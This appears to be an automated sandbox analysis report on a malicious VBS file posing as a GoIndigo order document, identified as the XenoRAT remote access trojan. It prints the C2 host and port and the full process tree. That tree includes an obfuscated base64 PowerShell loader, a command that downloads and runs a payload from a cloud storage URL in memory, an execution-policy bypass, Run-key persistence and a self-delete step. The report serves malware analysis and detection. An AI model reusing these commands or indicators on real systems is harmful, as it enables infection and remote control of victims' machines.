Overview

overview

10

Static

static

1

GOINDIGO_P...ls.vbs

windows7-x64

10

GOINDIGO_P...ls.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    102s
  • max time network
    102s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-07-2024 15:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    GOINDIGO_PN#_Desc_&_Qty Details.vbs

  • Size

    6.6MB

  • MD5

    6776a1e5031d3e57bff6359bc884c1f3

  • SHA1

    bb9883c15f718846f1e23744f09044fc6185f25f

  • SHA256

    56c0fcdebcda39f9a98c7b4471aeee2e8e7389bf2e5874fa945fe3f61c4ac654

  • SHA512

    7b0c36ffa6ffdf300cfe50539f096cbc3a0181b8a1632012c88bea3270cf239757c45b4f26a3aaf723b9bce29fdb22194ddd6351b669d2257fe34523fe1c1f81

  • SSDEEP

    1536:7ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssV:SI

Score
10/10
xenoratexecutionpersistencerattrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe

Extracted

Family

xenorat

C2

krecgh.4cloud.click

Mutex

Xeno_rat_nd8912d

Attributes
  • delay

    5000

  • install_path

    nothingset

  • port

    3398

  • startup_name

    nothingset

Signatures

  • XenorRat

    XenorRat is a remote access trojan written in C#.

    trojanratxenorat
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\GOINDIGO_PN#_Desc_&_Qty Details.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bw▒HM▒aQBj▒HQ▒I▒▒9▒C▒▒Jw▒w▒DE▒Jw▒7▒CQ▒ZgBp▒Ho▒YgBs▒C▒▒PQ▒g▒Cc▒JQBw▒Ho▒QQBj▒E8▒ZwBJ▒G4▒TQBy▒CU▒Jw▒7▒Fs▒QgB5▒HQ▒ZQBb▒F0▒XQ▒g▒CQ▒d▒Bi▒HQ▒ZgBi▒C▒▒PQ▒g▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBD▒G8▒bgB2▒GU▒cgB0▒F0▒Og▒6▒EY▒cgBv▒G0▒QgBh▒HM▒ZQ▒2▒DQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒g▒Cg▒TgBl▒Hc▒LQBP▒GI▒agBl▒GM▒d▒▒g▒E4▒ZQB0▒C4▒VwBl▒GI▒QwBs▒Gk▒ZQBu▒HQ▒KQ▒u▒EQ▒bwB3▒G4▒b▒Bv▒GE▒Z▒BT▒HQ▒cgBp▒G4▒Zw▒o▒Cc▒a▒B0▒HQ▒c▒Bz▒Do▒Lw▒v▒GY▒aQBy▒GU▒YgBh▒HM▒ZQBz▒HQ▒bwBy▒GE▒ZwBl▒C4▒ZwBv▒G8▒ZwBs▒GU▒YQBw▒Gk▒cw▒u▒GM▒bwBt▒C8▒dg▒w▒C8▒Yg▒v▒HI▒bwBk▒HI▒aQBh▒Gs▒Z▒▒t▒Dg▒N▒▒x▒DM▒Z▒▒u▒GE▒c▒Bw▒HM▒c▒Bv▒HQ▒LgBj▒G8▒bQ▒v▒G8▒LwBk▒Gw▒b▒▒l▒DI▒RgBk▒Gw▒b▒▒l▒DI▒M▒BI▒G8▒c▒Bl▒C4▒d▒B4▒HQ▒PwBh▒Gw▒d▒▒9▒G0▒ZQBk▒Gk▒YQ▒m▒HQ▒bwBr▒GU▒bg▒9▒DY▒MQBj▒Dg▒Mg▒5▒GY▒Ng▒t▒GU▒MQ▒5▒DY▒LQ▒0▒Dk▒ZQ▒4▒C0▒Yg▒0▒GY▒Zg▒t▒D▒▒N▒▒x▒DE▒Mw▒0▒DU▒Nw▒3▒GY▒ZgBl▒Cc▒KQ▒p▒Ds▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EE▒c▒Bw▒EQ▒bwBt▒GE▒aQBu▒F0▒Og▒6▒EM▒dQBy▒HI▒ZQBu▒HQ▒R▒Bv▒G0▒YQBp▒G4▒LgBM▒G8▒YQBk▒Cg▒J▒B0▒GI▒d▒Bm▒GI▒KQ▒u▒Ec▒ZQB0▒FQ▒eQBw▒GU▒K▒▒n▒EM▒b▒Bh▒HM▒cwBM▒Gk▒YgBy▒GE▒cgB5▒DM▒LgBD▒Gw▒YQBz▒HM▒MQ▒n▒Ck▒LgBH▒GU▒d▒BN▒GU▒d▒Bo▒G8▒Z▒▒o▒Cc▒WgB4▒Es▒S▒BH▒Cc▒KQ▒u▒Ek▒bgB2▒G8▒awBl▒Cg▒J▒Bu▒HU▒b▒Bs▒Cw▒I▒Bb▒G8▒YgBq▒GU▒YwB0▒Fs▒XQBd▒C▒▒K▒▒n▒DI▒Nw▒0▒DQ▒MQBl▒DQ▒ZQ▒y▒GI▒ZQ▒w▒C0▒M▒▒w▒GM▒YQ▒t▒GU▒MQ▒2▒DQ▒LQ▒4▒GQ▒N▒Bi▒C0▒MwBi▒Dg▒YwBl▒DM▒NwBl▒D0▒bgBl▒Gs▒bwB0▒CY▒YQBp▒GQ▒ZQBt▒D0▒d▒Bs▒GE▒PwB0▒Hg▒d▒▒u▒HI▒YQB0▒FM▒Z▒Bl▒FI▒LwBv▒C8▒bQBv▒GM▒LgB0▒G8▒c▒Bz▒H▒▒c▒Bh▒C4▒M▒▒4▒Dk▒Ng▒1▒C0▒ZQBw▒G8▒a▒▒v▒GI▒Lw▒w▒HY▒LwBt▒G8▒Yw▒u▒HM▒aQBw▒GE▒ZQBs▒Gc▒bwBv▒Gc▒LgBl▒Gc▒YQBy▒G8▒d▒Bz▒GU▒cwBh▒GI▒ZQBy▒Gk▒Zg▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒GY▒aQB6▒GI▒b▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒c▒Bz▒Gk▒YwB0▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\GOINDIGO_PN#_Desc_&_Qty Details.vbs');powershell -command $KByHL;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4484
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$psict = '01';$fizbl = 'C:\Users\Admin\AppData\Local\Temp\GOINDIGO_PN#_Desc_&_Qty Details.vbs';[Byte[]] $tbtfb = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($tbtfb).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('27441e4e2be0-00ca-e164-8d4b-3b8ce37e=nekot&aidem=tla?txt.ratSdeR/o/moc.topsppa.08965-epoh/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $fizbl , '_______________________-------------', $psict, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3876
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1996
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
            5⤵
            • Adds Run key to start application
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5116
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\GOINDIGO_PN#_Desc_&_Qty Details.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3624
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2220
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks.exe" /query /v /fo csv
            5⤵
              PID:1328
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4868
              • C:\Windows\SysWOW64\choice.exe
                choice /C Y /N /D Y /T 3
                6⤵
                  PID:1988

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        6cf293cb4d80be23433eecf74ddb5503

        SHA1

        24fe4752df102c2ef492954d6b046cb5512ad408

        SHA256

        b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

        SHA512

        0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        64B

        MD5

        d8b9a260789a22d72263ef3bb119108c

        SHA1

        376a9bd48726f422679f2cd65003442c0b6f6dd5

        SHA256

        d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

        SHA512

        550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        976B

        MD5

        7b07823effb30f11f2e228005f5e151f

        SHA1

        8962692fbac2ac00d347933f2e968113f154a3f0

        SHA256

        f79e67e83189d99614ba89d21670473953f9122eaf85db854b836353c93b7ec9

        SHA512

        561ef1d85d61a5ea5f6d434ed77ec3c8ce36deff035e800f73f22010c4ad6747d26fa03dd1166a6be439828155ee5eed84ec610347c83cd362f3c80c6294a9f0

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        64B

        MD5

        5caad758326454b5788ec35315c4c304

        SHA1

        3aef8dba8042662a7fcf97e51047dc636b4d4724

        SHA256

        83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

        SHA512

        4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mt2frmso.wq4.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        Filesize

        265B

        MD5

        3613b0cfa9cd66b5bc0bc4aabe147838

        SHA1

        94bb2a7ae944b9906f95ac19bd3fd199a4396a6b

        SHA256

        6bc7c43d63f298a0078345bac278b90076521d73259fc34f046df021d738f653

        SHA512

        282e0d1543850ea5affae87b3e66d1ffbf837c1f2c976843874dc6f0746bb989b18b9ff0be74726165cd8dbdb64068d21f9bd44f04eef5764e1f14fccd31698b

        Download Submit

      • memory/2220-67-0x0000000005F20000-0x0000000005F86000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2220-61-0x0000000000400000-0x0000000000412000-memory.dmp

        Filesize

        72KB

        Download

      • memory/3876-60-0x00000212D2180000-0x00000212D218A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3876-22-0x00000212D2170000-0x00000212D2178000-memory.dmp

        Filesize

        32KB

        Download

      • memory/4484-0-0x00007FFB5A243000-0x00007FFB5A245000-memory.dmp

        Filesize

        8KB

        Download

      • memory/4484-12-0x00007FFB5A240000-0x00007FFB5AD01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4484-11-0x00007FFB5A240000-0x00007FFB5AD01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4484-66-0x00007FFB5A240000-0x00007FFB5AD01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4484-1-0x0000015CFB0F0000-0x0000015CFB112000-memory.dmp

        Filesize

        136KB

        Download